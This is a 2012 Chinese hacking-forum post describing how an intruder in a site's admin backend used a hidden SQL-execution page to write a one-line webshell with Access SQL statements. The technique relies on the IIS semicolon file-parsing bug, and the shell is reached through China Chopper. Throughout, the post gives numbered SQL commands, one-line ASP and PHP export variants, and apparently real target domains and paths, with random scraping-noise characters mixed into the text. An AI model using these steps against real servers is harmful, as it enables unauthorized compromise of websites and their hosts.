中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
! ~8 A" w, |8 @2 w# D- owebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
; T% Z1 C! n6 t! o8 r  M文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,- o% h1 G# o4 T& Z, o
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
9 h( G3 p; a* K+ T" m. z1.create table cmd (a varchar(50))
+ z8 j' L  v  R3 l, h2.insert into cmd (a) values (‘‘)  H9 ?6 @/ c+ P$ U7 j
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
7 V9 x- i/ _6 g  \+ F, a(把表cmd的内容导出为物理路径的一个EXCEL文件)
, B2 j" y2 L+ u1 d, t% k1 x4.drop table cmd
1 e" o5 h- R9 U" X: U利用IIS的BUG成功拿到了WEBSHELL。4 k; L7 n# Y; t

: H( [" c" Q/ t1 U直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
# L5 F$ z: R4 K2 f9 e6 l* n2 u3 @- ]; ]: m6 A' \: v
  SQL语句意思解释:
+ M0 P& ]5 {3 b( O# t0 o  第一句
2 y  v3 w6 ]( O; T: ~9 C) J  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
, C5 K; D, C0 T, b$ \  T
5 `; j+ P5 Z& ]) p  第二句
) _1 ]% y  O; x) S  在表cmd的a字段插入一句话木马# A6 J$ Z# J' [0 z5 H/ t
  第三句& t- i% U& G1 z5 P* O2 N# A$ P$ e+ F
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件7 V& h- O* h* {9 [/ i

( A( P) Y9 D* c* C; c, x" ~* L  第四句5 _$ H2 [. F5 c) u/ g. m: @. ^
  删除建立的cmd表
2 n; i: t3 D- X/ T9 r9 o; d% j. S5 s: E0 r
  以下内容为测试:
* \1 x9 ~! L" t5 k. `. A: c% {/ }  Access利用后台SQL执行命令功能导出WebShell:
$ L4 A) I7 j1 m& W/ |- U  这个更简单:
. m$ S& v( l, E- z4 ~  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]* u3 |+ h6 i- x, Q" t
  或者* w# l; {, P# q
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]* j/ h# T+ b% @+ v1 m

. y) `' T0 Q* f  后台有执行SQL语句功能(vote为已知表段)) ~/ X3 j1 f4 h, R1 z. O
  希望对大家有所帮助拿shell的又一个思路
1 u8 o4 U* D- _+ Q: [




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2